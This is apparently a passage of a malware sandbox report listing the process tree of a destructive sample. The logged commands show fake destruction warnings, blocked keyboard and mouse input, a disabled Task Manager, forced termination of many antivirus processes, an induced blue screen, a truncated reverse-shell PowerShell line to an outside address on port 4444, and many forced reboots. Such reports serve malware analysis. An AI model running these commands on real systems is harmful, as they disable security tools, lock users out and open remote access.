        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2964
      - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\y3q36kvb.cmdline"
        6⤵
        
        PID:2456
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2400
      - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3gssl0c-.cmdline"
        6⤵
        
        PID:1880
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB990.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB98F.tmp"
        7⤵
        
        PID:2300
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        5⤵
        
        PID:2576
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2588
      - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nfptudw4.cmdline"
        6⤵
        
        PID:2928
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBC3E.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBC3D.tmp"
        7⤵
        
        PID:2352
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:264
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2588
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1220
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /F
        5⤵
        Kills process with taskkill
        
        PID:2056
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM AvastSvc.exe /F
        5⤵
        Kills process with taskkill
        
        PID:2848
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM avgsvc.exe /F
        5⤵
        
        PID:2592
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM McAfee.exe /F
        5⤵
        
        PID:2888
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Norton.exe /F
        5⤵
        Kills process with taskkill
        
        PID:1628
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kaspersky.exe /F
        5⤵
        
        PID:2496
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM BitDefender.exe /F
        5⤵
        
        PID:3004
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Sophos.exe /F
        5⤵
        Kills process with taskkill
        
        PID:1912
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM malwarebytes.exe /F
        5⤵
        
        PID:1860
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM CylanceSvc.exe /F
        5⤵
        
        PID:2596
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Panda.exe /F
        5⤵
        
        PID:1652
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM EsetService.exe /F
        5⤵
        
        PID:316
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class BlockInput { [DllImport(\"user32.dll\")] public static extern bool BlockInput(bool fBlockIt); }'; [BlockInput]::BlockInput($true)"
        5⤵
        
        PID:848
      - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\s6chy8yy.cmdline"
        6⤵
        
        PID:2096
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class BSoD { [DllImport(\"ntdll.dll\", SetLastError=true)] public static extern uint NtRaiseHardError(uint ErrorStatus, uint NumberOfParameters, uint UnicodeStringParameterMask, IntPtr Parameters, uint ResponseOption, out uint Response); }'; [BSoD]::NtRaiseHardError(0xc0000005, 0, 0, [IntPtr]::Zero, 6, [ref]0)"
        5⤵
        
        PID:1244
      - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f9mkfz2f.cmdline"
        6⤵
        
        PID:1228
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:1580
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2248
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:1644
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2152
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2668
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:3012
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:580
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2188
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:1380
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:1136
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:1904
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2196
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:1112
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2636
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2660
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2780
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:184
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:1888
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:904
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:1544
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:1612
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:896
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2752
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2936
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:1488
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2956
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:580
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2080
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:1692
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2380
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2892
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:1356
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:3012
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:896
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:1692
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2236
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2064
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:1700
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2280
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:1112
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2956
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2820
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2588
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:288
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2552
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2332
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2876
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:300
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2964
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2968
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2540
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:1656
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2532
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2688
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2752
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2136
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:1596
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:1048
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:784
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:1904
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2636
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2024
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:288
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:1628
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2740
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:604
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2716
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2060
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2516
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2780
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:1692
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2804
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:1560
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2752
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:184
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2136
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:1916
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:1544
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:3044
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2460
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:1588
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:3064
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2280
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:752
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2820
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2080
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2740
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2416
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:604
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:1144
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:3068
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:1380
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2928
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:296
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2912
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:1692
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:1656
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:1560
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2752
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2116
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:1596
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:1836
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:1660
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2168
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:1904
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2636
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:1488
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2672
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2868
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:1956
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2416
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:2900
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:1468
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2480
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\9ryrxcdk.cmdline"
      4⤵
      PID:2664
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2256
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ztokjpe1.cmdline"
      4⤵
      PID:2496
    - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBFF6.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBFF5.tmp"
        5⤵
        
        PID:1700
- - C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:3064
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2044
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rggp96v8.cmdline"
      4⤵
      PID:796
    - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC4B7.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC4B6.tmp"
        5⤵
        
        PID:1656
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2108
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1612
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
    3⤵
    PID:556
- - C:\Windows\system32\taskkill.exe
    taskkill /IM MsMpEng.exe /F
    3⤵
    - Kills process with taskkill
    PID:2444
- - C:\Windows\system32\taskkill.exe
    taskkill /IM AvastSvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:2124
- - C:\Windows\system32\taskkill.exe
    taskkill /IM avgsvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:2968
- - C:\Windows\system32\taskkill.exe
    taskkill /IM McAfee.exe /F
    3⤵
    - Kills process with taskkill
    PID:2480
- - C:\Windows\system32\taskkill.exe
    taskkill /IM Norton.exe /F
    3⤵
    PID:784
- - C:\Windows\system32\taskkill.exe
    taskkill /IM Kaspersky.exe /F
    3⤵
    PID:2972
- - C:\Windows\system32\taskkill.exe
    taskkill /IM BitDefender.exe /F
    3⤵
    - Kills process with taskkill
    PID:2396
- - C:\Windows\system32\taskkill.exe
    taskkill /IM Sophos.exe /F
    3⤵
    PID:1304
- - C:\Windows\system32\taskkill.exe
    taskkill /IM malwarebytes.exe /F
    3⤵
    PID:2176
- - C:\Windows\system32\taskkill.exe
    taskkill /IM CylanceSvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:2896
- - C:\Windows\system32\taskkill.exe
    taskkill /IM Panda.exe /F
    3⤵
    PID:2796
- - C:\Windows\system32\taskkill.exe
    taskkill /IM EsetService.exe /F
    3⤵
    - Kills process with taskkill
    PID:2776
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class BlockInput { [DllImport(\"user32.dll\")] public static extern bool BlockInput(bool fBlockIt); }'; [BlockInput]::BlockInput($true)"
    3⤵
    PID:2812
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sqpzs2xs.cmdline"
      4⤵
      PID:480
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class BSoD { [DllImport(\"ntdll.dll\", SetLastError=true)] public static extern uint NtRaiseHardError(uint ErrorStatus, uint NumberOfParameters, uint UnicodeStringParameterMask, IntPtr Parameters, uint ResponseOption, out uint Response); }'; [BSoD]::NtRaiseHardError(0xc0000005, 0, 0, [IntPtr]::Zero, 6, [ref]0)"
    3⤵
    PID:2124
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yb92jznf.cmdline"
      4⤵
      PID:2060
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:2768
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:2668
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:1488
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:3068
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:2064
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:1700
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:2060
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:848
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:2768
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:1068
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:2636
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:2392
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:984
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:2660
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:2780
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:2784
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:1976
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:2236
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:2932
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:2196
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:2620
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:1648
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:2396
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:2708
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:2876
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:480
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:556
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:1188
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:2804
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:2016
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:2688
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:532
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:2816
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:2920
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:3064
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:2176
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:2748
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:2300
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:2456
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:2708
